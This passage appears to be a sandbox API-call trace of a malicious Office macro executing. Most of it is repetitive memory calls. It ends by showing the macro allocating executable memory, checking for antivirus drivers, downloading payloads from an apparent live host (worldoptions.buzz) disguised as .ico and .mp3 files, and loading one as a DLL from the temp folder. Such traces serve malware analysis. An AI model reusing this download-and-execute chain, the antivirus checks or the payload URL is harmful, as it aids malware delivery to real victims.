_Dst=0xcaa5fbd) returned 0xcaa5fbd [0114.523] memcpy (in: _Dst=0xcaa5fcd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5fcd) returned 0xcaa5fcd [0114.523] memcpy (in: _Dst=0xcaa5fdd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5fdd) returned 0xcaa5fdd [0114.523] memcpy (in: _Dst=0xcaa5fed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5fed) returned 0xcaa5fed [0114.523] memcpy (in: _Dst=0xcaa5ffd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5ffd) returned 0xcaa5ffd [0114.523] memcpy (in: _Dst=0xcaa600d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa600d) returned 0xcaa600d [0114.523] memcpy (in: _Dst=0xcaa601d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa601d) returned 0xcaa601d [0114.523] memcpy (in: _Dst=0xcaa602d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa602d) returned 0xcaa602d [0114.523] memcpy (in: _Dst=0xcaa603d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa603d) returned 0xcaa603d [0114.523] memcpy (in: _Dst=0xcaa604d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa604d) returned 0xcaa604d [0114.523] memcpy (in: _Dst=0xcaa605d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa605d) returned 0xcaa605d [0114.523] memcpy (in: _Dst=0xcaa606d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa606d) returned 0xcaa606d [0114.523] memcpy (in: _Dst=0xcaa607d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa607d) returned 0xcaa607d [0114.523] memcpy (in: _Dst=0xcaa608d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa608d) returned 0xcaa608d [0114.523] memcpy (in: _Dst=0xcaa609d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa609d) returned 0xcaa609d [0114.523] memcpy (in: _Dst=0xcaa60ad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa60ad) returned 0xcaa60ad [0114.524] memcpy (in: _Dst=0xcaa60bd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa60bd) returned 0xcaa60bd [0114.524] memcpy (in: _Dst=0xcaa60cd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa60cd) returned 0xcaa60cd [0114.524] memcpy (in: _Dst=0xcaa60dd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa60dd) returned 0xcaa60dd [0114.524] memcpy (in: _Dst=0xcaa60ed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa60ed) returned 0xcaa60ed [0114.524] memcpy (in: _Dst=0xcaa60fd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa60fd) returned 0xcaa60fd [0114.524] memcpy (in: _Dst=0xcaa610d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa610d) returned 0xcaa610d [0114.524] memcpy (in: _Dst=0xcaa611d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa611d) returned 0xcaa611d [0114.524] memcpy (in: _Dst=0xcaa612d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa612d) returned 0xcaa612d [0114.524] memcpy (in: _Dst=0xcaa613d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa613d) returned 0xcaa613d [0114.524] memcpy (in: _Dst=0xcaa614d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa614d) returned 0xcaa614d [0114.524] memcpy (in: _Dst=0xcaa615d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa615d) returned 0xcaa615d [0114.524] memcpy (in: _Dst=0xcaa616d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa616d) returned 0xcaa616d [0114.524] memcpy (in: _Dst=0xcaa617d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa617d) returned 0xcaa617d [0114.524] memcpy (in: _Dst=0xcaa618d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa618d) returned 0xcaa618d [0114.524] memcpy (in: _Dst=0xcaa619d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa619d) returned 0xcaa619d [0114.524] memcpy (in: _Dst=0xcaa61ad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa61ad) returned 0xcaa61ad [0114.524] memcpy (in: _Dst=0xcaa61bd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa61bd) returned 0xcaa61bd [0114.524] memcpy (in: _Dst=0xcaa61cd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa61cd) returned 0xcaa61cd [0114.524] memcpy (in: _Dst=0xcaa61dd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa61dd) returned 0xcaa61dd [0114.524] memcpy (in: _Dst=0xcaa61ed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa61ed) returned 0xcaa61ed [0114.524] memcpy (in: _Dst=0xcaa61fd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa61fd) returned 0xcaa61fd [0114.524] memcpy (in: _Dst=0xcaa620d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa620d) returned 0xcaa620d [0114.524] memcpy (in: _Dst=0xcaa621d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa621d) returned 0xcaa621d [0114.524] memcpy (in: _Dst=0xcaa622d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa622d) returned 0xcaa622d [0114.524] memcpy (in: _Dst=0xcaa623d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa623d) returned 0xcaa623d [0114.524] memcpy (in: _Dst=0xcaa624d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa624d) returned 0xcaa624d [0114.524] memcpy (in: _Dst=0xcaa625d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa625d) returned 0xcaa625d [0114.524] CRetailMalloc_Realloc () returned 0xcaa5660 [0114.524] memcpy (in: _Dst=0xcaa626d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa626d) returned 0xcaa626d [0114.524] memcpy (in: _Dst=0xcaa627d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa627d) returned 0xcaa627d [0114.524] memcpy (in: _Dst=0xcaa628d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa628d) returned 0xcaa628d [0114.524] memcpy (in: _Dst=0xcaa629d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa629d) returned 0xcaa629d [0114.525] memcpy (in: _Dst=0xcaa62ad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa62ad) returned 0xcaa62ad [0114.525] memcpy (in: _Dst=0xcaa62bd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa62bd) returned 0xcaa62bd [0114.525] memcpy (in: _Dst=0xcaa62cd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa62cd) returned 0xcaa62cd [0114.525] memcpy (in: _Dst=0xcaa62dd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa62dd) returned 0xcaa62dd [0114.525] memcpy (in: _Dst=0xcaa62ed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa62ed) returned 0xcaa62ed [0114.525] memcpy (in: _Dst=0xcaa62fd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa62fd) returned 0xcaa62fd [0114.525] memcpy (in: _Dst=0xcaa630d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa630d) returned 0xcaa630d [0114.525] memcpy (in: _Dst=0xcaa631d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa631d) returned 0xcaa631d [0114.525] memcpy (in: _Dst=0xcaa632d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa632d) returned 0xcaa632d [0114.525] memcpy (in: _Dst=0xcaa633d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa633d) returned 0xcaa633d [0114.525] memcpy (in: _Dst=0xcaa634d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa634d) returned 0xcaa634d [0114.525] memcpy (in: _Dst=0xcaa635d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa635d) returned 0xcaa635d [0114.525] memcpy (in: _Dst=0xcaa636d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa636d) returned 0xcaa636d [0114.525] memcpy (in: _Dst=0xcaa637d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa637d) returned 0xcaa637d [0114.525] memcpy (in: _Dst=0xcaa638d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa638d) returned 0xcaa638d [0114.525] memcpy (in: _Dst=0xcaa639d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa639d) returned 0xcaa639d [0114.525] memcpy (in: _Dst=0xcaa63ad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa63ad) returned 0xcaa63ad [0114.525] memcpy (in: _Dst=0xcaa63bd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa63bd) returned 0xcaa63bd [0114.525] memcpy (in: _Dst=0xcaa63cd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa63cd) returned 0xcaa63cd [0114.525] memcpy (in: _Dst=0xcaa63dd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa63dd) returned 0xcaa63dd [0114.525] memcpy (in: _Dst=0xcaa63ed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa63ed) returned 0xcaa63ed [0114.525] memcpy (in: _Dst=0xcaa63fd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa63fd) returned 0xcaa63fd [0114.525] memcpy (in: _Dst=0xcaa640d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa640d) returned 0xcaa640d [0114.525] memcpy (in: _Dst=0xcaa641d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa641d) returned 0xcaa641d [0114.525] memcpy (in: _Dst=0xcaa642d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa642d) returned 0xcaa642d [0114.525] memcpy (in: _Dst=0xcaa643d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa643d) returned 0xcaa643d [0114.525] memcpy (in: _Dst=0xcaa644d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa644d) returned 0xcaa644d [0114.525] memcpy (in: _Dst=0xcaa645d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa645d) returned 0xcaa645d [0114.525] memcpy (in: _Dst=0xcaa646d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa646d) returned 0xcaa646d [0114.525] memcpy (in: _Dst=0xcaa647d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa647d) returned 0xcaa647d [0114.525] memcpy (in: _Dst=0xcaa648d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa648d) returned 0xcaa648d [0114.525] memcpy (in: _Dst=0xcaa649d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa649d) returned 0xcaa649d [0114.526] memcpy (in: _Dst=0xcaa64ad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa64ad) returned 0xcaa64ad [0114.526] memcpy (in: _Dst=0xcaa64bd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa64bd) returned 0xcaa64bd [0114.526] memcpy (in: _Dst=0xcaa64cd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa64cd) returned 0xcaa64cd [0114.526] memcpy (in: _Dst=0xcaa64dd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa64dd) returned 0xcaa64dd [0114.526] memcpy (in: _Dst=0xcaa64ed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa64ed) returned 0xcaa64ed [0114.526] memcpy (in: _Dst=0xcaa64fd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa64fd) returned 0xcaa64fd [0114.526] memcpy (in: _Dst=0xcaa650d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa650d) returned 0xcaa650d [0114.526] memcpy (in: _Dst=0xcaa651d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa651d) returned 0xcaa651d [0114.526] memcpy (in: _Dst=0xcaa652d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa652d) returned 0xcaa652d [0114.526] memcpy (in: _Dst=0xcaa653d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa653d) returned 0xcaa653d [0114.526] memcpy (in: _Dst=0xcaa654d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa654d) returned 0xcaa654d [0114.526] CRetailMalloc_Realloc () returned 0xcaa5660 [0114.526] CRetailMalloc_Realloc () returned 0x102a1268 [0114.526] CRetailMalloc_Realloc () returned 0x102a1268 [0114.526] CRetailMalloc_Realloc () returned 0x102a1268 [0114.526] CRetailMalloc_Realloc () returned 0x102a1268 [0114.526] CRetailMalloc_Realloc () returned 0x102a1268 [0114.526] CRetailMalloc_Realloc () returned 0x102a1268 [0114.527] CRetailMalloc_Realloc () returned 0x102a1268 [0114.527] CRetailMalloc_Realloc () returned 0x102a1268 [0114.527] CRetailMalloc_Realloc () returned 0x102a1268 [0114.527] CRetailMalloc_Realloc () returned 0x102a1268 [0114.527] CRetailMalloc_Realloc () returned 0xca99e90 [0114.527] CRetailMalloc_Realloc () returned 0xca99e90 [0114.527] CRetailMalloc_Realloc () returned 0xca99e90 [0114.527] CRetailMalloc_Realloc () returned 0xca99e90 [0114.527] CRetailMalloc_Realloc () returned 0xca99e90 [0114.527] CRetailMalloc_Realloc () returned 0xca99e90 [0114.528] CRetailMalloc_Realloc () returned 0xca99e90 [0114.528] CRetailMalloc_Realloc () returned 0xca99e90 [0114.528] CRetailMalloc_Realloc () returned 0xca99e90 [0114.528] CRetailMalloc_Realloc () returned 0xca99e90 [0114.528] CRetailMalloc_Realloc () returned 0xca99e90 [0114.528] CRetailMalloc_Realloc () returned 0xca99e90 [0114.528] CRetailMalloc_Realloc () returned 0xca99e90 [0114.528] CRetailMalloc_Realloc () returned 0xca99e90 [0114.528] CRetailMalloc_Realloc () returned 0xca99e90 [0114.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x688aded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.529] CRetailMalloc_Realloc () returned 0xca99e90 [0114.530] CRetailMalloc_Free () returned 0x1 [0114.530] GetCurrentProcess () returned 0xffffffff [0114.530] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca722cc, dwSize=0x14) returned 1 [0114.530] VirtualProtect (in: lpAddress=0xca722cc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x6f762c | out: lpflOldProtect=0x6f762c*=0x40) returned 1 [0114.531] GetCurrentProcess () returned 0xffffffff [0114.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca722cd, dwSize=0x2) returned 1 [0114.531] GetCurrentProcess () returned 0xffffffff [0114.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca722ec, dwSize=0x14) returned 1 [0114.531] VirtualProtect (in: lpAddress=0xca722ec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x6f762c | out: lpflOldProtect=0x6f762c*=0x40) returned 1 [0114.531] GetCurrentProcess () returned 0xffffffff [0114.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca722ed, dwSize=0x2) returned 1 [0114.531] GetCurrentProcess () returned 0xffffffff [0114.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca7230c, dwSize=0x14) returned 1 [0114.532] VirtualProtect (in: lpAddress=0xca7230c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x6f762c | out: lpflOldProtect=0x6f762c*=0x40) returned 1 [0114.532] GetCurrentProcess () returned 0xffffffff [0114.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca7230d, dwSize=0x2) returned 1 [0114.532] GetCurrentProcess () returned 0xffffffff [0114.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca7443c, dwSize=0x19) returned 1 [0114.532] VirtualProtect (in: lpAddress=0xca7443c, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x6f7648 | out: lpflOldProtect=0x6f7648*=0x4) returned 1 [0114.533] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.554] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0114.555] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x68670000 [0114.556] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.556] GetProcAddress (hModule=0x68670000, lpProcName=0x284) returned 0x686a5c5c [0114.557] GetCurrentProcess () returned 0xffffffff [0114.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca73448, dwSize=0x19) returned 1 [0114.557] VirtualProtect (in: lpAddress=0xca73448, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x6f7648 | out: lpflOldProtect=0x6f7648*=0x4) returned 1 [0114.557] GetCurrentProcess () returned 0xffffffff [0114.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca733c8, dwSize=0x19) returned 1 [0114.557] VirtualProtect (in: lpAddress=0xca733c8, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x6f7648 | out: lpflOldProtect=0x6f7648*=0x40) returned 1 [0114.559] GetAsyncKeyState (vKey=3) returned 0 [0114.559] memcpy (in: _Dst=0x6f7f50, _Src=0xcaa14e0, _Size=0x18 | out: _Dst=0x6f7f50) returned 0x6f7f50 [0114.559] SafeArrayAllocData (psa=0x6f7f50) returned 0x0 [0114.559] GetAsyncKeyState (vKey=3) returned 0 [0114.559] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.559] _stricmp (_Str1="ntdll", _Str2="VBE6.DLL") returned -8 [0114.559] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0114.561] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.562] GetProcAddress (hModule=0x771d0000, lpProcName="ZwAllocateVirtualMemory") returned 0x77246e00 [0114.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6f7f48*=0x0, ZeroBits=0x0, RegionSize=0x6f7f3c*=0x5000, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x6f7f48*=0x10fa0000, RegionSize=0x6f7f3c*=0x5000) returned 0x0 [0114.563] GetLastError () returned 0x5 [0114.563] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.563] _stricmp (_Str1="kernel32", _Str2="VBE6.DLL") returned -11 [0114.563] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0114.564] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.564] GetProcAddress (hModule=0x76720000, lpProcName="MultiByteToWideChar") returned 0x76732ad0 [0114.564] MultiByteToWideChar (in: CodePage=0xfde8, dwFlags=0x0, lpMultiByteStr=0xcaa5660, cbMultiByte=4096, lpWideCharStr=0x10fa0000, cchWideChar=4096 | out: lpWideCharStr="ノ啠荕䃬\瓙荝૭䶍먦岚砀 ㈀) returned 2920 [0114.565] GetLastError () returned 0x5 [0114.565] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.565] _stricmp (_Str1="kernelbase", _Str2="VBE6.DLL") returned -11 [0114.565] LoadLibraryA (lpLibFileName="kernelbase") returned 0x76910000 [0114.565] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.566] GetProcAddress (hModule=0x76910000, lpProcName="Internal_EnumUILanguages") returned 0x769e0540 [0114.566] Internal_EnumUILanguages () returned 0x0 [0114.567] VirtualAlloc (lpAddress=0x0, dwSize=0x500000, flAllocationType=0x3000, flProtect=0x40) returned 0x10fb0000 [0114.604] LoadLibraryA (lpLibFileName="urlmon") returned 0x71780000 [0114.606] URLDownloadToCacheFileA (in: lpUnkcaller=0x0, szURL="http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.ico", szFileName=0x10fb006c, cchFileName=0x100, dwReserved=0x0, pBSC=0x0 | out: szFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\5RNK44FE\\OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu[1].ico" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\ie\\5rnk44fe\\oghayzzfhfctspqorbfnymrxhn7txilz8vjv1tpmuyrc2yiu[1].ico")) returned 0x0 [0117.904] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\5RNK44FE\\OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu[1].ico" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\ie\\5rnk44fe\\oghayzzfhfctspqorbfnymrxhn7txilz8vjv1tpmuyrc2yiu[1].ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xc98 [0117.904] ReadFile (in: hFile=0xc98, lpBuffer=0x10fb016c, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x6f7aa8, lpOverlapped=0x0 | out: lpBuffer=0x10fb016c*, lpNumberOfBytesRead=0x6f7aa8*=0x102b, lpOverlapped=0x0) returned 1 [0117.904] CloseHandle (hObject=0xc98) returned 1 [0117.904] VirtualAlloc (lpAddress=0x0, dwSize=0x500000, flAllocationType=0x3000, flProtect=0x40) returned 0x11780000 [0117.934] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x11c80000 [0117.935] Wow64DisableWow64FsRedirection (in: OldValue=0x6f7ab0 | out: OldValue=0x6f7ab0*=0x0) returned 1 [0117.935] GetLocalTime (in: lpSystemTime=0x6f7a80 | out: lpSystemTime=0x6f7a80*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x6, wDay=0xd, wHour=0x14, wMinute=0x2b, wSecond=0x1d, wMilliseconds=0x1b4)) [0117.935] GetFileAttributesA (lpFileName="C:\\windows\\system32\\drivers\\gzflt.sys" (normalized: "c:\\windows\\system32\\drivers\\gzflt.sys")) returned 0xffffffff [0117.936] GetFileAttributesA (lpFileName="C:\\windows\\system32\\drivers\\klif.sys" (normalized: "c:\\windows\\system32\\drivers\\klif.sys")) returned 0xffffffff [0117.936] GetFileAttributesA (lpFileName="C:\\windows\\system32\\drivers\\ehdrv.sys" (normalized: "c:\\windows\\system32\\drivers\\ehdrv.sys")) returned 0xffffffff [0117.936] GetFileAttributesA (lpFileName="C:\\windows\\system32\\drivers\\aswsp.sys" (normalized: "c:\\windows\\system32\\drivers\\aswsp.sys")) returned 0xffffffff [0117.936] GetFileAttributesA (lpFileName="C:\\windows\\system32\\drivers\\bsfs.sys" (normalized: "c:\\windows\\system32\\drivers\\bsfs.sys")) returned 0xffffffff [0117.936] GetFileAttributesA (lpFileName="C:\\windows\\system32\\drivers\\360AvFlt.sys" (normalized: "c:\\windows\\system32\\drivers\\360avflt.sys")) returned 0xffffffff [0117.936] LoadLibraryA (lpLibFileName="shell32") returned 0x74eb0000 [0117.937] LoadLibraryA (lpLibFileName="urlmon") returned 0x71780000 [0117.937] LoadLibraryA (lpLibFileName="advapi32") returned 0x76600000 [0117.938] ExpandEnvironmentStringsA (in: lpSrc="%tmp%\\wnitmpo.dll", lpDst=0x117801e0, nSize=0x100 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll") returned 0x31 [0117.938] ExpandEnvironmentStringsA (in: lpSrc="%tmp%\\document.doc", lpDst=0x117802e0, nSize=0x100 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\document.doc") returned 0x32 [0117.938] URLDownloadToFileA (param_1=0x0, param_2="http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp3", param_3="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wnitmpo.dll"), param_4=0x0, param_5=0x0) returned 0x0 [0118.841] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wnitmpo.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xcac [0118.842] WriteFile (in: hFile=0xcac, lpBuffer=0x6f7aa8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x6f7aa4, lpOverlapped=0x0 | out: lpBuffer=0x6f7aa8*, lpNumberOfBytesWritten=0x6f7aa4*=0x4, lpOverlapped=0x0) returned 1 [0118.842] CloseHandle (hObject=0xcac) returned 1 [0118.851] LoadLibraryA (lpLibFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll") returned 0x690d0000 [0118.891] GetProcessHeap () returned 0x7e0000 [0118.893] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0118.894] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0118.894] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0118.894] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0118.895] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0118.895] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSectionEx") returned 0x76746740 [0118.904] GetProcAddress (hModule=0x76720000, lpProcName="CreateEventExW") returned 0x767466a0 [0118.905] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreExW") returned 0x76746700 [0118.905] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadStackGuarantee") returned 0x7673b040 [0118.906] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolTimer") returned 0x7673ace0 [0118.906] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolTimer") returned 0x77217dc0 [0118.907] GetProcAddress (hModule=0x76720000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77224010 [0118.907] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolTimer") returned 0x77222a50 [0118.908] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWait") returned 0x7673a7b0 [0118.908] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolWait") returned 0x77222290 [0118.908] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWait") returned 0x77222910 [0118.912] GetProcAddress (hModule=0x76720000, lpProcName="FlushProcessWriteBuffers") returned 0x77247a60 [0118.913] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7723ac00 [0118.913] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcessorNumber") returned 0x7722a890 [0118.913] GetProcAddress (hModule=0x76720000, lpProcName="GetLogicalProcessorInformation") returned 0x7673ac80 [0118.914] GetProcAddress (hModule=0x76720000, lpProcName="CreateSymbolicLinkW") returned 0x76760830 [0118.914] GetProcAddress (hModule=0x76720000, lpProcName="SetDefaultDllDirectories") returned 0x76a46270 [0118.915] GetProcAddress (hModule=0x76720000, lpProcName="EnumSystemLocalesEx") returned 0x7673fe80 [0118.915] GetProcAddress (hModule=0x76720000, lpProcName="CompareStringEx") returned 0x7673ff80 [0118.916] GetProcAddress (hModule=0x76720000, lpProcName="GetDateFormatEx") returned 0x76760e00 [0118.916] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoEx") returned 0x7673a750 [0118.917] GetProcAddress (hModule=0x76720000, lpProcName="GetTimeFormatEx") returned 0x76761240 [0118.917] GetProcAddress (hModule=0x76720000, lpProcName="GetUserDefaultLocaleName") returned 0x7673ad60 [0118.918] GetProcAddress (hModule=0x76720000, lpProcName="IsValidLocaleName") returned 0x76761460 [0118.918] GetProcAddress (hModule=0x76720000, lpProcName="LCMapStringEx") returned 0x76739a10 [0118.919] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentPackageId") returned 0x769cded0 [0118.919] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount64") returned 0x76733630 [0118.920] GetProcAddress (hModule=0x76720000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0118.920] GetProcAddress (hModule=0x76720000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0118.921] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x3bc) returned 0xcaae188 [0118.921] GetCurrentThreadId () returned 0x12cc [0118.921] GetCommandLineA () returned="\"C:\\Program Files 